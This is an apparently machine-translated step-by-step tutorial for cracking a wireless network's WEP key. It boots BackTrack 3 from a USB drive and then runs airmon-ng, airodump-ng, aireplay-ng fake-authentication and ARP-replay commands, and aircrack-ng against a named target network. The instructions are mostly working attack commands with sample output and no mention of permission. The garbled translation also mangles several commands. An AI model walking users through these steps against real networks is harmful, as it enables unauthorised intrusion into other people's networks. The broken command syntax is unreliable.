1. Start the USB flash drive: Decompress the downloaded backtrack3 (BT3) USB Version (bt3b141207.rar file at the end of the article) to the USB flash drive (larger than 1 GB ). Put the Boot and BT3 folders in the root directory of the USB flash drive, and double-click the BOOT folder to run the "bootinst. bat" batch file. There will be four more files in the USB flash drive. "isolinux. boot "" isolinux. cfg "" isolinux. bin "" syslinux. cfg "(if you want the BT3 menu of the Chinese section, download the BT3 Chinese Language Pack. Decompress the "Chinese" package in the compressed package and copy the *. lzm file to the BT3modules directory of the USB flash drive to implement the bt3 culture .)
2. restart windows to enter BIOS settings, set the frist boot device in BIOS to USB-HDD (or USB--ZIP) and then restart from usb boot. The system enters the backtrack3 system.
3. Start cracking now
1. Enter the ifconfig command in the shell window and the following information is displayed:
Lo no wireless extensions.
Eth0 no wireless extensions.
Eth1 IEEE 802.11g ESSID: "" Nickname :""
Mode :( ......) Frequency: 2.452 GHz Access Point: 00: 0F: B5: 88: AC: 82
Bit Rate: 0 kb/s Tx-Power: 18 dBm sensiti.pdf = 0/3
Retry: off RTS thr: off Fragment thr: off
Encryption key: off
Power Management: off
Link Quality = 0/94 Signal level =-95 dBm Noise level =-95 dBm
Rx invalid nwid: 0 Rx invalid crypt: 0 Rx invalid frag: 0
Tx excessive retries: 0 Invalid misc: 0 Missed beacon: 0
2. Find out your wireless network card name. Here I am eth1. then start your network card in Moniter mode (enter airmon-ng start eth1 11 ). Enter the ifconfig command and return the following information:
Lo no wireless extensions.
Eth0 no wireless extensions.
Eth1 IEEE 802.11g ESSID: "" Nickname :""
Mode: Monitor Frequency: 2.452 GHz Access Point: 00: 0F: B5: 88: AC: 82
Bit Rate: 0 kb/s Tx-Power: 18 dBm sensiti.pdf = 0/3
Retry: off RTS thr: off Fragment thr: off
Encryption key: off
Power Management: off
Link Quality = 0/94 Signal level =-95 dBm Noise level =-95 dBm
Rx invalid nwid: 0 Rx invalid crypt: 0 Rx invalid frag: 0
Tx excessive retries: 0 Invalid misc: 0 Missed beacon: 0
3. Enter the command airodump-ng-c 11 -- bssid 00: 1A: 01: 8D: C3: B2-w outputs eth1.
In the command, "11" indicates the channel number to be cracked, "bssid" indicates the MAC physical address of the target, and "outputs" indicates the name of the package to be generated. Press enter to run.
4. open another shell and enter aireplay-ng-1 0-e targetnet-a 00: 1A: 01: 8D: C3: B2-h 00: A1: C1: D8: A5: B6 eth1.
"Targetnet" indicates the target network name to be cracked. 00: 1A: 01: 8D: C3: B2 indicates the physical address of the target MAC, 00: A1: C1: D8: a5: B6 indicates the MAC address of the local Nic
5. Open another shell and input aireplay-ng-3-B 00: 1A: 01: 8D: C3: B2-h 00: A1: C1: D8: A5: B6 eth1.
Obtain more data packets.
6. When the returned data volume reaches 10 thousand, it can be cracked. Open another shell and input aircrack-ng-z-B 00: 1A: 01: 8D: C3: B2 outputs. cap to crack the program. If the attack fails, let the attacker capture packets until the attack is cracked.